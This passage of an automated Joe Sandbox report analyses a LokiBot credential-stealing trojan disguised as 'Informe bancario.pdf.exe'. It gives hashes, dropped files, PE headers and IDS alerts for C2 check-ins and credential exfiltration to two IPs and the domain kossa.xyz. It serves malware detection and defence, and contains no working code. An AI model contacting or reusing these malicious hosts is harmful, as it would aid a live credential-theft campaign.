00000000.00000003.267763841.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266216146.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267060843.000000000578D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.tiro.comInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designersInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.goodfont.co.krInforme bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.goodfont.co.krFInforme bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.carterandcone.comlInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sajatypeworks.comInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.goodfont.co.krZInforme bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.typography.netDInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/cTheInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://fontfabrik.comInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cnInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.jiyu-kobo.co.jp/sInforme bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.tiro.comUInforme bancario.pdf.exe, 00000000.00000003.257122280.000000000576B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.commInforme bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/Informe bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/DPleaseInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers8Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.comceInforme bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fonts.comInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.sandoll.co.krInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.deDPleaseInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sandoll.co.krEInforme bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.zhongyicts.com.cnInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sakkal.comInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.40.153
                                  unknownUnited States
                                  13335CLOUDFLARENETUStrue
                                  172.67.154.72
                                  kossa.xyzUnited States
                                  13335CLOUDFLARENETUStrue
                                  Joe Sandbox Version:35.0.0 Citrine
                                  Analysis ID:651256
                                  Start date and time: 23/06/202217:53:082022-06-23 17:53:08 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 8m 7s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:Informe bancario.pdf.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:24
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@5/3@46/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HDC Information:
                                  • Successful, ratio: 17.3% (good quality ratio 8.8%)
                                  • Quality average: 33.1%
                                  • Quality standard deviation: 39.1%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • HTTP Packets have been reduced
                                  • TCP Packets have been reduced to 100
                                  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                  • Execution Graph export aborted for target Informe bancario.pdf.exe, PID 6800 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  TimeTypeDescription
                                  17:54:22API Interceptor44x Sleep call for process: Informe bancario.pdf.exe modified
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.355304211458859
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                  Malicious:true
                                  Reputation:high, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                  Process:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:1
                                  Process:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):46
                                  Entropy (8bit):1.0424600748477153
                                  Encrypted:false
                                  SSDEEP:3:/lbON:u
                                  MD5:89CA7E02D8B79ED50986F098D5686EC9
                                  SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                                  SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                                  SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:........................................user.
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.605576053949014
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:Informe bancario.pdf.exe
                                  File size:497664
                                  MD5:603fe9a434da79407213db7d4b907789
                                  SHA1:812797eae86b27f54e5caadb021a4c00c31e4a7e
                                  SHA256:07776cc1a0981b4143d63533a5e30f2deb4f545f4d27544cda60f5d07b602593
                                  SHA512:1e18fd13addd394ed2fddc401e48d111f5da9c2119cf96a57377623e77fd7ca26a51cf49cfc543b0e012303a31d9dd666e397b6ffca858fffebe50417e332d18
                                  SSDEEP:12288:TpkPRxliW1CCQo4gg4kX5B2tA6fIVeZJPhLn8Nc5UDceiGk:lkPRrhLvLkX50MeZJpLna2UDuR
                                  TLSH:CAB4E1E4E3A45EABD843D3BC587C811427A7FB4AC4ACD6057CF6748AA5B23E55093E03
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.................. ........@.. ....................................@................................
                                  Icon Hash:00828e8e8686b000
                                  Entrypoint:0x47adbe
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x62B4812E [Thu Jun 23 15:05:18 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7ad6c0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x444.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x78dc40x78e00False0.809062338417787data7.621462978207712IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0x7c0000x4440x600False0.2805989583333333data2.4690099230174813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x7e0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountry
                                  RT_VERSION0x7c0580x3e8data
                                  DLLImport
                                  mscoree.dll_CorExeMain
                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.3172.67.154.7249744802025381 06/23/22-17:54:38.472164TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249767802024313 06/23/22-17:54:57.914899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349836802021641 06/23/22-17:55:40.617404TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349843802025381 06/23/22-17:55:45.763232TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249746802021641 06/23/22-17:54:42.346945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249749802024313 06/23/22-17:54:47.375834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249767802024318 06/23/22-17:54:57.914899TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249770802024313 06/23/22-17:55:02.423254TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349745802025381 06/23/22-17:54:39.886492TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249844802021641 06/23/22-17:55:50.553165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249749802024318 06/23/22-17:54:47.375834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249762802025381 06/23/22-17:54:52.263394TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249773802021641 06/23/22-17:55:09.049678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249877802021641 06/23/22-17:56:13.789082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349876802024318 06/23/22-17:56:11.073086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349876802024313 06/23/22-17:56:11.073086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349778802025381 06/23/22-17:55:15.087771TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249859802021641 06/23/22-17:55:58.152468TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249771802024318 06/23/22-17:55:04.009923TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249768802024318 06/23/22-17:54:59.413778TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349876802025381 06/23/22-17:56:11.073086TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349835802021641 06/23/22-17:55:36.607918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349775802021641 06/23/22-17:55:12.061012TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349780802024318 06/23/22-17:55:16.534873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249875802024313 06/23/22-17:56:08.656582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249768802024313 06/23/22-17:54:59.413778TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249816802021641 06/23/22-17:55:26.329557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249875802024318 06/23/22-17:56:08.656582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249743802025381 06/23/22-17:54:37.108830TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249771802025381 06/23/22-17:55:04.009923TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249757802024318 06/23/22-17:54:50.135454TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249770802024318 06/23/22-17:55:02.423254TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349745802024313 06/23/22-17:54:39.886492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349774802021641 06/23/22-17:55:10.726793TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249769802021641 06/23/22-17:55:00.833023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249772802025381 06/23/22-17:55:07.425069TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249852802021641 06/23/22-17:55:55.592533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349780802024313 06/23/22-17:55:16.534873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349872802025381 06/23/22-17:56:02.086134TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349745802024318 06/23/22-17:54:39.886492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249757802024313 06/23/22-17:54:50.135454TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349792802021641 06/23/22-17:55:18.935502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349881802021641 06/23/22-17:56:16.928509TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249882802024313 06/23/22-17:56:19.809048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349776802024318 06/23/22-17:55:13.438859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349813802024313 06/23/22-17:55:22.328153TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249770802025381 06/23/22-17:55:02.423254TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349776802024313 06/23/22-17:55:13.438859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249877802025381 06/23/22-17:56:13.789082TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349883802021641 06/23/22-17:56:20.757705TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349813802024318 06/23/22-17:55:22.328153TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249741802024317 06/23/22-17:54:33.910153TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974180192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249747802021641 06/23/22-17:54:44.305987TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249845802024313 06/23/22-17:55:53.427872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249744802021641 06/23/22-17:54:38.472164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249741802024312 06/23/22-17:54:33.910153TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974180192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349865802024313 06/23/22-17:56:00.557524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249762802024313 06/23/22-17:54:52.263394TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349865802024318 06/23/22-17:56:00.557524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249767802025381 06/23/22-17:54:57.914899TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249773802025381 06/23/22-17:55:09.049678TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249845802024318 06/23/22-17:55:53.427872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349766802021641 06/23/22-17:54:56.372364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249831802021641 06/23/22-17:55:33.546351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.3172.67.154.72
